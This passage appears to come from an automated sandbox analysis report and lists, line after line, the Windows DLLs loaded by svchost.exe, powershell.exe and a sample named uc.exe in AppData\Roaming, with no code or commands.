                    Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: url.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: ieframe.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: netapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: endpointdlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: eamsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: smartscreenps.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
